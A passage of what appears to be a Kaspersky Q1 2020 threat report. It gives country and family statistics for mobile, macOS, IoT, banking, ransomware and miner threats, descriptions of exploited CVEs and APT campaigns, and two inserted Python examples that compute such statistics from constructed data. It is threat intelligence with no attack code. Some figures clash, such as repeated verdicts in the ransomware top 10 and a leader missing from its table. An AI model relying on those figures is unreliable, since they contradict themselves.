** Unique users attacked by mobile banking trojans as a percentage of all users of Kaspersky mobile products in the country.

In Q1 2020, Japan (0.57%) had the largest share of users attacked by mobile bankers; the vast majority of cases involved Trojan-Banker.AndroidOS.Agent.eq.

In second place came Spain (0.48%), where in more than half of all cases, we detected malware from the Trojan-Banker.AndroidOS.Cebruser family, and another quarter of detections were members of the Trojan-Banker.AndroidOS.Ginp family.

Third place belonged to Italy (0.26%), where, as in Spain, the Trojan-Banker.AndroidOS.Cebruser family was the most widespread with almost two-thirds of detections.

It is worth saying a bit more about the Cebruser family. Its creators were among the first to exploit the coronavirus topic to spread the malware.

When it runs, the trojan immediately gets down to business: it requests access to Accessibility Services to obtain Device Admin permissions, and then tries to get hold of card details.

The malware is distributed under the Malware-as-a-Service model; its set of functions is standard for such threats, but with one interesting detail — the use of a step-counter for activation so as to bypass dynamic analysis tools (sandbox). Cebruser targets the mobile apps of banks in various countries and popular non-financial apps; its main weapons are phishing windows and interception of two-factor authorization. In addition, the malware can block the screen using a ransomware tool and intercept keystrokes on the virtual keyboard.

Mobile ransomware trojans

In Q1 2020, we detected 4,339 installation packages of mobile trojan ransomware, 1,067 fewer than in the previous quarter.

Number of installation packages of mobile ransomware trojans detected by Kaspersky, Q1 2019 – Q1 2020

Top 10 mobile ransomware trojans

      Verdict                                   %*
 1    Trojan-Ransom.AndroidOS.Svpeng.aj         17.08
 2    Trojan-Ransom.AndroidOS.Congur.e          12.70
 3    Trojan-Ransom.AndroidOS.Small.as          11.41
 4    Trojan-Ransom.AndroidOS.Rkor.k             9.88
 5    Trojan-Ransom.AndroidOS.Small.as           7.32
 6    Trojan-Ransom.AndroidOS.Small.o            4.79
 7    Trojan-Ransom.AndroidOS.Svpeng.aj          3.62
 8    Trojan-Ransom.AndroidOS.Svpeng.ah          3.55
 9    Trojan-Ransom.AndroidOS.Congur.e           3.32
10    Trojan-Ransom.AndroidOS.Fusob.h            3.17

* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products who were attacked by ransomware trojans.

Over the past few quarters, the number of ransomware trojans detected has been gradually decreasing; all the same, we continue to detect quite a few infection attempts by this class of threats. The main contributors to the statistics were the Svpeng, Congur, and Small ransomware families.

Geography of mobile ransomware trojans, Q1 2020

Top 10 countries by share of users attacked by mobile ransomware trojans

      Country*        %**
 1    USA             0.26
 2    Kazakhstan      0.25
 3    Iran            0.16
 4    China           0.09
 5    Saudi Arabia    0.08
 6    Italy           0.03
 7    Mexico          0.03
 8    Canada          0.03
 9    Indonesia       0.03
10    Switzerland     0.03

* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000).
** Unique users attacked by mobile ransomware trojans as a percentage of all users of Kaspersky mobile products in the country.

The leaders by share of users attacked by mobile ransomware trojans were Syria (0.28%), the United States (0.26%) and Kazakhstan (0.25%).

Attacks on Apple macOS

In Q1 2020, we detected not only new versions of common threats, but one new backdoor family, whose first member was Backdoor.OSX.Capip.a. The malware’s operating principle is simple: it calls the C&C for a shell script, which it then downloads and executes.

Top 20 threats to macOS

      Verdict                                   %*
 1    Trojan-Downloader.OSX.Shlayer.a           19.27
 2    AdWare.OSX.Pirrit.j                       10.34
 3    AdWare.OSX.Cimpli.k                        6.69
 4    AdWare.OSX.Ketin.h                         6.27
 5    AdWare.OSX.Pirrit.aa                       5.75
 6    AdWare.OSX.Pirrit.o                        5.74
 7    AdWare.OSX.Pirrit.x                        5.18
 8    AdWare.OSX.Spc.a                           4.56
 9    AdWare.OSX.Cimpli.f                        4.25
10    AdWare.OSX.Bnodlero.t                      4.08
11    AdWare.OSX.Bnodlero.x                      3.74
12    Hoax.OSX.SuperClean.gen                    3.71
13    AdWare.OSX.Cimpli.h                        3.37
14    AdWare.OSX.Pirrit.v                        3.30
15    AdWare.OSX.Amc.c                           2.98
16    AdWare.OSX.MacSearch.d                     2.85
17    RiskTool.OSX.Spigot.a                      2.84
18    AdWare.OSX.Pirrit.s                        2.80
19    AdWare.OSX.Ketin.d                         2.76
20    AdWare.OSX.Bnodlero.aq                     2.70

* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked.

The top 20 threats for macOS did not undergo any major changes in Q1 2020. The adware trojan Shlayer.a (19.27%) still tops the leaderboard, followed by objects that Shlayer itself loads into the infected system, in particular, numerous adware apps from the Pirrit family.

Interestingly, the unwanted program Hoax.OSX.SuperClean.gen landed in 12th place on the list. Like other Hoax-type programs, it is distributed under the guise of a system cleanup app, and immediately after installation, scares the user with problems purportedly found in the system, such as gigabytes of trash on the hard drive.

Threat geography

      Country*        %**
 1    Spain           7.14
 2    France          6.94
 3    Italy           5.94
 4    Canada          5.58
 5    USA             5.49
 6    Russia          5.10
 7    India           4.88
 8    Mexico          4.78
 9    Brazil          4.65
10    Belgium         4.65

* Excluded from the rankings are countries with relatively few users of Kaspersky security solutions for macOS (under 5,000).
** Unique users who encountered macOS threats as a percentage of all users of Kaspersky security solutions for macOS in the country.

The leading countries, as in previous quarters, were Spain (7.14%), France (6.94%) and Italy (5.94%). The main contributors to the number of detections in these countries were the familiar Shlayer trojan and adware apps from the Pirrit family.

IoT attacks

IoT threat statistics

In Q1 2020, the share of IP addresses from which attempts were made to attack Kaspersky telnet traps increased significantly. Their share amounted to 81.1% of all IP addresses from which attacks were carried out, while SSH traps accounted for slightly less than 19%.

SSH       18.9%
Telnet    81.1%

Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2020

It was a similar situation with control sessions: attackers often controlled infected traps via telnet.

SSH       39.62%
Telnet    60.38%

Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2020

Telnet-based attacks

Geography of device IP addresses where attacks at Kaspersky telnet traps originated, Q1 2020

Top 10 countries by location of devices from which attacks were carried out on Kaspersky telnet traps

Country*      %
China         13.04
Egypt         11.65
Brazil        11.33
Vietnam        7.38
Taiwan         6.18
Russia         4.38
Iran           3.96
India          3.14
Turkey         3.00
USA            2.57

For several quarters in a row, the leading country by number of attacking bots has been China: in Q1 2020 its share stood at 13.04%. As before, it is followed by Egypt (11.65%) and Brazil (11.33%).
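As an added example (not part of the report or of Kaspersky's own tooling), the Python below turns constructed honeypot connection records into the three figures the telnet/SSH section reports: the share of unique attacking IPs per service, the share of control sessions per service, and the ranking of source countries for one service. The log format, the IP-to-country map and the rule that an IP hitting both services is counted once per service are assumptions.

```python
"""Aggregate honeypot connection records into per-service and per-country
shares of the kind shown in the IoT threat statistics.

Constructed example: the log format, addresses and GeoIP mapping are invented."""
from collections import Counter, defaultdict
import re

# Constructed sample records (TEST-NET addresses, not real traffic):
#   <timestamp> <service> src=<ip> session=<id>
SAMPLE_LOG = """\
2020-01-14T03:21:07Z telnet src=203.0.113.10 session=a1
2020-01-14T03:21:09Z telnet src=203.0.113.11 session=a2
2020-01-14T03:22:41Z telnet src=203.0.113.12 session=a3
2020-01-14T03:25:00Z telnet src=203.0.113.13 session=a4
2020-01-14T04:01:12Z ssh src=198.51.100.7 session=b1
2020-01-14T04:01:40Z ssh src=198.51.100.7 session=b2
2020-01-14T04:02:05Z ssh src=198.51.100.7 session=b3
2020-01-14T04:10:55Z telnet src=203.0.113.10 session=a5
"""

# Constructed IP -> country table standing in for a GeoIP lookup (assumption).
SAMPLE_GEO = {
    "203.0.113.10": "China",
    "203.0.113.11": "Egypt",
    "203.0.113.12": "Brazil",
    "203.0.113.13": "China",
    "198.51.100.7": "Vietnam",
}

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<service>telnet|ssh)\s+src=(?P<ip>[0-9.]+)\s+session=(?P<sid>\S+)$"
)


def parse_records(text):
    """Parse log lines into dicts; a malformed line raises instead of being silently skipped,
    so a format change in the honeypot cannot quietly skew the statistics."""
    records = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"line {lineno}: unrecognised record {line!r}")
        records.append(m.groupdict())
    return records


def _percent(part, whole):
    return round(100.0 * part / whole, 2) if whole else 0.0


def share_by_unique_ip(records):
    """Share of each service among unique attacking IPs (the report's first chart).
    Assumption: an IP that hits both services is counted once per service."""
    ips = defaultdict(set)
    for r in records:
        ips[r["service"]].add(r["ip"])
    total = sum(len(s) for s in ips.values())
    return {svc: _percent(len(s), total) for svc, s in ips.items()}


def share_by_session(records):
    """Share of each service among all sessions (the report's second chart);
    one record is one session."""
    counts = Counter(r["service"] for r in records)
    total = sum(counts.values())
    return {svc: _percent(n, total) for svc, n in counts.items()}


def sessions_per_ip(records):
    """Average sessions per attacking IP for each service. When one service's bots
    reconnect more often, its session share exceeds its unique-IP share."""
    sessions = Counter(r["service"] for r in records)
    ips = defaultdict(set)
    for r in records:
        ips[r["service"]].add(r["ip"])
    return {svc: round(sessions[svc] / len(ips[svc]), 2) for svc in ips}


def top_countries(records, service, geo, n=10):
    """Rank source countries for one service by unique attacking IPs, as a share of
    that service's unique IPs. IPs missing from the GeoIP table go to 'unknown'."""
    ips = {r["ip"] for r in records if r["service"] == service}
    by_country = Counter(geo.get(ip, "unknown") for ip in ips)
    ranked = sorted(by_country.items(), key=lambda kv: (-kv[1], kv[0]))
    return [(country, _percent(cnt, len(ips))) for country, cnt in ranked[:n]]


if __name__ == "__main__":
    recs = parse_records(SAMPLE_LOG)
    print("unique-IP share:", share_by_unique_ip(recs))
    print("session share:  ", share_by_session(recs))
    print("sessions per IP:", sessions_per_ip(recs))
    print("telnet sources: ", top_countries(recs, "telnet", SAMPLE_GEO))
```

On the constructed data the telnet share drops from 80% of unique IPs to 62.5% of sessions because the single SSH source reconnects three times, the same effect the report shows between its two charts.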

SSH-based attacks

Geography of device IP addresses where attacks at Kaspersky SSH traps originated, Q1 2020

Top 10 countries by location of devices from which attacks were made on Kaspersky SSH traps

Country*      %
China         14.87
Vietnam       11.58
USA            7.03
Egypt          6.82
Brazil         5.79
Russia         4.66
India          4.16
Germany        3.64
Thailand       3.44
France         2.83

In Q1 2020, China (14.87%), Vietnam (11.58%) and the US (7.03%) made up the top three countries by number of unique IPs from which attacks on SSH traps originated.

Threats loaded into honeypots

Verdict                                   %*
Trojan-Downloader.Linux.NyaDrop.b         64.35
Backdoor.Linux.Mirai.b                    16.75
Backdoor.Linux.Mirai.ba                    6.47
Backdoor.Linux.Gafgyt.a                    4.36
Backdoor.Linux.Gafgyt.bj                   1.30
Trojan-Downloader.Shell.Agent.p            0.68
Backdoor.Linux.Mirai.c                     0.64
Backdoor.Linux.Hajime.b                    0.46
Backdoor.Linux.Mirai.h                     0.40
Backdoor.Linux.Gafgyt.av                   0.35

* Share of malware type in the total amount of malware downloaded to IoT devices following a successful attack.

In Q1 2020, attackers most often downloaded the minimalistic trojan loader NyaDrop (64.35%), whose executable file does not exceed 500 KB. Threats from the Mirai family traditionally dominated: its members claimed four places in our top 10. These malicious programs will continue to rule the world of IoT threats for a long time to come, at least until the appearance of a more advanced (and publicly available) DDoS bot.

Financial threats

Financial threat statistics

In Q1 2020, Kaspersky solutions blocked attempts to launch one or several types of malware designed to steal money from bank accounts on the computers of 249,748 users.

Number of unique users attacked by financial malware, Q1 2020

Attack geography

To assess and compare the risk of being infected by banking trojans and ATM/POS malware in various countries, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.

Geography of banking malware attacks, Q1 2020

Top 10 countries by share of attacked users

      Country*        %**
 1    Uzbekistan      10.5
 2    Tajikistan       6.9
 3    Turkmenistan     5.5
 4    Afghanistan      5.1
 5    Yemen            3.1
 6    Kazakhstan       3.0
 7    Guatemala        2.8
 8    Syria            2.4
 9    Sudan            2.1
10    Kyrgyzstan       2.1

* Excluded are countries with relatively few Kaspersky product users (under 10,000).
** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country.

Top 10 banking malware families

      Name              Verdicts                               %*
 1    Emotet            Backdoor.Win32.Emotet                  21.3
 2    Zbot              Trojan.Win32.Zbot                      20.8
 3    CliptoShuffler    Trojan-Banker.Win32.CliptoShuffler     17.2
 4    RTM               Trojan-Banker.Win32.RTM                12.3
 5    Nimnul            Virus.Win32.Nimnul                      3.6
 6    Trickster         Trojan.Win32.Trickster                  3.6
 7    Neurevt           Trojan.Win32.Neurevt                    3.3
 8    SpyEye            Trojan-Spy.Win32.SpyEye                 2.3
 9    Danabot           Trojan-Banker.Win32.Danabot             2.0
10    Nymaim            Trojan.Win32.Nymaim                     1.9

* Unique users attacked by this malware family as a percentage of all users attacked by financial malware.

Ransomware programs

Quarterly highlights

Ransomware attacks on organizations, as well as on city and municipal networks, did not ease off. Given how lucrative they are for cybercriminals, there is no reason why this trend of several years should cease.

More and more ransomware is starting to supplement encryption with data theft. To date, this tactic has been adopted by distributors of ransomware families, including Maze, REvil/Sodinokibi, DoppelPaymer and JSWorm/Nemty/Nefilim. If the victim refuses to pay the ransom for decryption (because, say, the data was recovered from a backup copy), the attackers threaten to put the stolen confidential information in the public domain. Such threats are sometimes empty, but not always: the authors of several ransomware programs have set up websites that do indeed publish the data of victim organizations.

Number of new modifications

In Q1 2020, we detected five new ransomware families and 5,225 new modifications of these malware programs.

Number of new ransomware modifications detected, Q1 2019 – Q1 2020

Number of users attacked by ransomware trojans

In Q1 2020, Kaspersky products and technologies protected 178,922 users from ransomware attacks.

Number of unique users attacked by ransomware trojans, Q1 2020

Attack geography

Geography of attacks by ransomware trojans, Q1 2020

Top 10 countries attacked by ransomware trojans

      Country*        %**
 1    Bangladesh      6.64
 2    Uzbekistan      1.98
 3    Mozambique      1.77
 4    Ethiopia        1.67
 5    Nepal           1.34
 6    Afghanistan     1.31
 7    Egypt           1.21
 8    Ghana           0.83
 9    Azerbaijan      0.81
10    Serbia          0.74

* Excluded are countries with relatively few Kaspersky users (under 50,000).
** Unique users whose computers were attacked by ransomware trojans as a percentage of all unique users of Kaspersky products in the country.

Top 10 most common families of ransomware trojans

      Name                  Verdicts                                                  %*
 1    WannaCry              Trojan-Ransom.Win32.Wanna                                 19.03
 2    (generic verdict)     Trojan-Ransom.Win32.Gen                                   16.71
 3    (generic verdict)     Trojan-Ransom.Win32.Phny                                  16.22
 4    GandCrab              Trojan-Ransom.Win32.GandCrypt                              7.73
 5    Stop                  Trojan-Ransom.Win32.Stop                                   6.62
 6    (generic verdict)     Trojan-Ransom.Win32.Encoder                                4.28
 7    (generic verdict)     Trojan-Ransom.Win32.Crypren                                4.15
 8    PolyRansom/VirLock    Virus.Win32.PolyRansom, Trojan-Ransom.Win32.PolyRansom     2.96
 9    Crysis/Dharma         Trojan-Ransom.Win32.Crusis                                 2.02
10    (generic verdict)     Trojan-Ransom.Win32.Generic                                1.56

* Unique Kaspersky users attacked by the specified family of ransomware trojans as a percentage of all users attacked by ransomware trojans.

Miners

Number of new modifications

In Q1 2020, Kaspersky solutions detected 192,036 new miner modifications.

Number of new miner modifications, Q1 2020

Number of users attacked by miners

In Q1, we detected attacks using miners on the computers of 518,857 unique users of Kaspersky Lab products worldwide.

Number of unique users attacked by miners, Q1 2020

Attack geography

Geography of miner attacks, Q1 2020

Top 10 countries attacked by miners

      Country*        %**
 1    Afghanistan     6.72
 2    Ethiopia        4.90
 3    Tanzania        3.26
 4    Sri Lanka       3.22
 5    Uzbekistan      3.10
 6    Rwanda          2.56
 7    Vietnam         2.54
 8    Kazakhstan      2.45
 9    Mozambique      1.96
10    Pakistan        1.67

* Excluded are countries with relatively few users of Kaspersky products (under 50,000).
** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country.

Vulnerable applications used by cybercriminals during cyberattacks

We already noted that Microsoft Office vulnerabilities are the most common ones. Q1 2020 was no exception: the share of exploits for these vulnerabilities grew to 74.83%. The most popular vulnerability in Microsoft Office was CVE-2017-11882, which is related to a stack overflow error in the Equation Editor component. Hard on its heels was CVE-2017-8570, which is used to embed a malicious script in an OLE object inside an Office document. Several other vulnerabilities, such as CVE-2018-0802 and CVE-2017-8759, were also popular with attackers. In the absence of security updates for Microsoft Office, these vulnerabilities are successfully exploited and the user’s system becomes infected.

In second place were exploits for vulnerabilities in Internet browsers (11.06%). In Q1, cybercriminals attacked a whole host of browsers, including Microsoft Internet Explorer, Google Chrome, and Mozilla Firefox. What’s more, some of the vulnerabilities were used in APT attacks, such as CVE-2020-0674, which is associated with the incorrect handling of objects in memory in an outdated version of the JScript scripting engine in Internet Explorer, leading to code execution. Another example is the previously identified CVE-2019-17026, a data type mismatch vulnerability in Mozilla Firefox’s JIT compiler, which also leads to remote code execution. In the event of a successful attack, both browser exploits cause a malware infection. The researchers also detected a targeted attack against Google Chrome exploiting the RCE vulnerability CVE-2020-6418 in the JavaScript engine; in addition, the dangerous RCE vulnerability CVE-2020-0767 was detected in a component of the ChakraCore scripting engine used by Microsoft Edge. Although modern browsers have their own protection mechanisms, cybercriminals are forever finding ways around them, very often using chains of exploits to do so. Therefore, it is vital to keep the operating system and software up to date at all times.

Distribution of exploits used in attacks by type of application attacked, Q1 2020

This quarter, a wide range of critical vulnerabilities were detected in operating systems and their components.

  • CVE-2020-0601 is a vulnerability that exploits an error in the core cryptographic library of Windows, in a certificate validation algorithm that uses elliptic curves. This vulnerability enables the use of fake certificates that the system recognizes as legitimate.
  • CVE-2020-0729 is a vulnerability in processing LNK files in Windows, which allows remote code execution if the user opens a malicious shortcut.
  • CVE-2020-0688 is the result of a default configuration error in Microsoft Exchange Server, whereby the same cryptographic keys are used to sign and encrypt serialized ASP.NET ViewState data, enabling attackers to execute their own code on the server side with system rights.

Various network attacks on system services and network protocols were as popular as ever with attackers. We continue to detect attempts at exploiting vulnerabilities in the SMB protocol using EternalBlue, EternalRomance and similar sets of exploits. In Q1 2020, the new vulnerability CVE-2020-0796 (SMBGhost) was detected in the SMBv3 network protocol. It leads to remote code execution, and the attacker does not even need to know a username/password combination, since the error occurs before the authentication stage; however, it is present only in Windows 10. Two critical vulnerabilities (CVE-2020-0609 and CVE-2020-0610) were found in Remote Desktop Gateway, enabling an unauthorized user to execute code remotely on the target system. In addition, there were more frequent attempts to brute-force passwords to Remote Desktop Services and Microsoft SQL Server via the SMB protocol.

Attacks via web resources

The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.

Countries that are sources of web-based attacks: Top 10

The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q1 2020, Kaspersky solutions defeated 726,536,269 attacks launched from online resources located in 203 countries worldwide. As many as 442,039,230 unique URLs were recognized as malicious by Web Anti-Virus components.

Distribution of web-based attack sources by country, Q1 2020

Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country, we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

     Country*                        % of attacked users**
 1   Bulgaria                        13.89
 2   Tunisia                         13.63
 3   Algeria                         13.15
 4   Libya                           12.05
 5   Bangladesh                       9.79
 6   Greece                           9.66
 7   Latvia                           9.64
 8   Somalia                          9.20
 9   Philippines                      9.11
10   Morocco                          9.10
11   Albania                          9.09
12   Taiwan, Province of China        9.04
13   Mongolia                         9.02
14   Nepal                            8.69
15   Indonesia                        8.62
16   Egypt                            8.61
17   Georgia                          8.47
18   France                           8.44
19   Palestine                        8.34
20   Qatar                            8.30

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky products in the country.

These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to providing statistical data.

On average, 6.56% of Internet users’ computers worldwide experienced at least one Malware-class attack.

Geography of malicious web-based attacks, Q1 2020

Local threats

In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users’ computers or removable media connected to computers (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.).

In Q1 2020, our File Anti-Virus registered 164,653,290 malicious and potentially unwanted objects. 

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal-computer infection in different countries.

Note that this rating only includes attacks by malicious programs that fall under the Malware class; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

     Country*                        % of attacked users**
 1   Afghanistan                     52.20
 2   Tajikistan                      47.14
 3   Uzbekistan                      45.16
 4   Ethiopia                        45.06
 5   Myanmar                         43.14
 6   Bangladesh                      42.14
 7   Kyrgyzstan                      41.52
 8   Yemen                           40.88
 9   China                           40.67
10   Benin                           40.21
11   Mongolia                        39.58
12   Algeria                         39.55
13   Laos                            39.21
14   Burkina Faso                    39.09
15   Malawi                          38.42
16   Sudan                           38.34
17   Rwanda                          37.84
18   Iraq                            37.82
19   Vietnam                         37.42
20   Mauritania                      37.26

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked as a percentage of all unique users of Kaspersky products in the country.

Geography of local infection attempts, Q1 2020

Overall, 19.16% of user computers globally faced at least one Malware-class local threat during Q1.
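The web-based and local infection ratings above are built the same way: the share of unique users per country on whose computer the relevant module (Web Anti-Virus or File Anti-Virus) returned a Malware-class verdict, with countries under 10,000 users left out and RiskTool/adware triggers ignored. The following Python is an added illustration of that calculation over a constructed telemetry sample; it is not Kaspersky's own code, the record layout, the module names "WAV"/"FAV" and the computation of the worldwide figure over all users (without the per-country cut-off) are assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple


@dataclass(frozen=True)
class Detection:
    """One Anti-Virus trigger reported by a consenting user (constructed layout)."""
    user_id: str
    module: str         # assumed names: "WAV" (Web Anti-Virus) or "FAV" (File Anti-Virus)
    verdict_class: str  # "Malware", "RiskTool", "Adware", ...


def country_rating(user_countries: Dict[str, str],
                   detections: Iterable[Detection],
                   module: str,
                   min_users: int = 10_000) -> List[Tuple[str, float]]:
    """Percentage of unique users per country with at least one Malware-class
    verdict from `module`, ranked as in the report's tables.

    * countries with fewer than `min_users` unique users are excluded (footnote *)
    * only Malware-class verdicts count; RiskTool/adware triggers are ignored (footnote **)
    * a user is counted once, however many detections they produced
    """
    users_by_country: Dict[str, set] = defaultdict(set)
    for uid, country in user_countries.items():
        users_by_country[country].add(uid)

    attacked_by_country: Dict[str, set] = defaultdict(set)
    for d in detections:
        if d.module != module or d.verdict_class != "Malware":
            continue
        country = user_countries.get(d.user_id)
        if country is None:  # detection from a user outside the consenting population
            continue
        attacked_by_country[country].add(d.user_id)

    rows = []
    for country, users in users_by_country.items():
        if len(users) < min_users:
            continue
        share = 100.0 * len(attacked_by_country[country]) / len(users)
        rows.append((country, round(share, 2)))
    rows.sort(key=lambda r: (-r[1], r[0]))  # highest share first, name breaks ties
    return rows


def global_share(user_countries: Dict[str, str],
                 detections: Iterable[Detection],
                 module: str) -> float:
    """Worldwide share of users with at least one Malware-class trigger.
    Assumed to be taken over all users, i.e. without the per-country cut-off."""
    attacked = {d.user_id for d in detections
                if d.module == module and d.verdict_class == "Malware"
                and d.user_id in user_countries}
    return round(100.0 * len(attacked) / len(user_countries), 2)


def constructed_telemetry():
    """Synthetic population: country A (20,000 users), B (15,000), C (5,000, below cut-off)."""
    user_countries = {}
    for country, n in (("A", 20_000), ("B", 15_000), ("C", 5_000)):
        for i in range(n):
            user_countries[f"{country}-{i}"] = country
    detections = []
    # A: 2,778 users hit by web malware, one of them twice (must not double count),
    # plus 500 users with RiskTool-only triggers (must not count at all)
    detections += [Detection(f"A-{i}", "WAV", "Malware") for i in range(2_778)]
    detections.append(Detection("A-0", "WAV", "Malware"))
    detections += [Detection(f"A-{i}", "WAV", "RiskTool") for i in range(2_778, 3_278)]
    # B: 1,449 users hit by web malware; 3,000 users hit only by File Anti-Virus
    detections += [Detection(f"B-{i}", "WAV", "Malware") for i in range(1_449)]
    detections += [Detection(f"B-{i}", "FAV", "Malware") for i in range(3_000)]
    # C: heavily attacked, but too few users to be ranked
    detections += [Detection(f"C-{i}", "WAV", "Malware") for i in range(3_773)]
    return user_countries, detections


if __name__ == "__main__":
    users, dets = constructed_telemetry()
    for rank, (country, pct) in enumerate(country_rating(users, dets, "WAV"), 1):
        print(f"{rank:2d}  {country:<4} {pct:6.2f}")
    print(f"worldwide: {global_share(users, dets, 'WAV'):.2f}%")
```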

May 20, 2020

IT threat evolution Q1 2020

Targeted attacks and malware campaigns

Operation AppleJeus: the sequel

In 2018, we published a report on Operation AppleJeus, one of the more notable campaigns of the threat actor Lazarus, currently one of the most active and prolific APT groups. One notable feature of this campaign was that it marked the first time Lazarus had targeted macOS users, with the group inventing a fake company in order to deliver its manipulated application and exploit the high level of trust among potential victims.

Our follow-up research revealed significant changes to the group’s attack methodology. To attack macOS victims, Lazarus has developed homemade macOS malware and added an authentication mechanism to deliver the next stage payload very carefully, as well as loading the next-stage payload without touching the disk. In addition, to attack Windows victims, the group has elaborated a multi-stage infection procedure and made significant changes to the final payload. We believe Lazarus has been more careful in its attacks since the release of Operation AppleJeus and has employed a number of methods to avoid detection.

We identified several victims as part of our ongoing research, in the UK, Poland, Russia and China. Moreover, we were able to confirm that several of the victims are linked to cryptocurrency business organizations.

Roaming Mantis turns to SMiShing and enhances anti-researcher techniques

Kaspersky continues to track the Roaming Mantis campaign. This threat actor was first reported in 2017, when it used SMS to distribute its malware to Android devices in just one country – South Korea. Since then, the scope of the group’s activities has widened considerably. Roaming Mantis now supports 27 languages, targets iOS as well as Android and includes cryptocurrency mining for PCs in its arsenal.

Roaming Mantis is strongly motivated by financial gain and is continuously looking for new targets. The group has also put a lot of effort into evading tracking by researchers, including implementing obfuscation techniques and using whitelisting to avoid infecting researchers who navigate to the malicious landing page. While the group is currently applying whitelisting only to Korean pages, we think it is only a matter of time before Roaming Mantis implements this for other languages.

Roaming Mantis has also added new malware families, including Fakecop and Wroba.j. The actor is still very active in using ‘SMiShing’ for Android malware distribution. This is particularly alarming, because it means that the attackers could combine infected mobile devices into a botnet for malware delivery, SMiShing, and so on. In one of the more recent methods used by the group, a downloaded malicious APK file contains an icon that impersonates a major courier company brand: the spoofed brand icon is customized for the country it targets – for example, Sagawa Express for Japan, Yamato Transport and FedEx for Taiwan, CJ Logistics for South Korea and Econt Express for Russia.

WildPressure on industrial networks in the Middle East

In March, we reported a targeted campaign to distribute Milum, a Trojan designed to gain remote control of devices in target organizations, some of which operate in the industrial sector. We detected the first signs of this operation, which we have dubbed WildPressure, in August 2019; and the campaign remains active.

The Milum samples that we have seen so far do not share any code similarities with any known APT campaigns. All of them allow the attackers to control infected devices remotely: letting them download and execute commands, collect information from the compromised computer and send it to the C2 server and install upgrades to the malware.

Attacks on industrial targets can be particularly devastating. So far, we haven’t seen evidence that the threat actor behind WildPressure is trying to do anything beyond gathering data from infected networks. However, the campaign is still in development, so we don’t yet know what other functionality might be added.

To avoid becoming a victim of this and other targeted attacks, organizations should do the following.

  • Update all software regularly, especially when a new patch becomes available.
  • Deploy a security solution with a proven track record, such as Kaspersky Endpoint Security, that is equipped with behavior-based protection against known and unknown threats, including exploits.
  • On top of endpoint protection, implement a corporate-grade security solution designed to detect advanced threats against the network, such as Kaspersky Anti Targeted Attack Platform.
  • Ensure staff understand social engineering and other methods used by attackers and develop a security culture within the organization.
  • Provide your security team with access to comprehensive cyberthreat intelligence, such as Kaspersky APT Intelligence Reporting.

TwoSail Junk

On January 10, we discovered a watering-hole attack that utilized a full remote iOS exploit chain to deploy a feature-rich implant named LightSpy. Judging by the content of the landing page, the site appears to have been designed to target users in Hong Kong.

Since then, we have released two private reports on LightSpy, available to customers of Kaspersky Intelligence Reporting (please contact intelreports@kaspersky.com for further information).

We are temporarily calling the APT group behind this implant TwoSail Junk. Currently, we have hints from known backdoor callbacks to infrastructure that this campaign clusters with previous activity. We are also working with fellow researchers to tie LightSpy to prior activity from a well-established Chinese-speaking APT group, previously reported (here and here) as Spring Dragon (aka Lotus Blossom and Billburg(Thrip)), known for its Lotus Elise and Evora backdoors.

As this LightSpy activity was disclosed publicly by fellow researchers from Trend Micro, we wanted to contribute missing information to the story without duplicating content. In addition, in our quest to secure technologies for a better future, we have reported this malware and activity to Apple and other relevant companies.

Our report includes information about the Android implant, including its deployment, spread and support infrastructure.

A sprinkling of Holy Water in Asia

In December, we discovered watering-hole websites that were compromised to selectively trigger a drive-by download attack with fake Adobe Flash update warnings.

This campaign, which has been active since at least May 2019, targets an Asian religious and ethnic group. The threat actor’s unsophisticated but creative toolset, which has evolved greatly and may still be in development, makes use of Sojson obfuscation, NSIS installer, Python, open-source code, GitHub distribution, Go language and Google Drive-based C2 channels.

The threat actor’s operational target is unclear because we haven’t been able to observe many live operations. We have also been unable to identify any overlap with known APT groups.

Threat hunting with Bitscout

In February, Vitaly Kamluk, from the Global Research and Analysis Team at Kaspersky, reported on a new version of Bitscout, based on the upcoming release of Ubuntu 20.04 (scheduled for release in April 2020).

Bitscout is a remote digital forensics tool that we open-sourced about two and a half years ago, when Vitaly was located in the Digital Forensics Lab at INTERPOL. Bitscout has helped us in many cyber-investigations. Based on the widely popular Ubuntu Linux distribution, it incorporates forensics and malware analysis tools created by a large number of excellent developers around the world.

Here’s a summary of the approach we use in Bitscout:

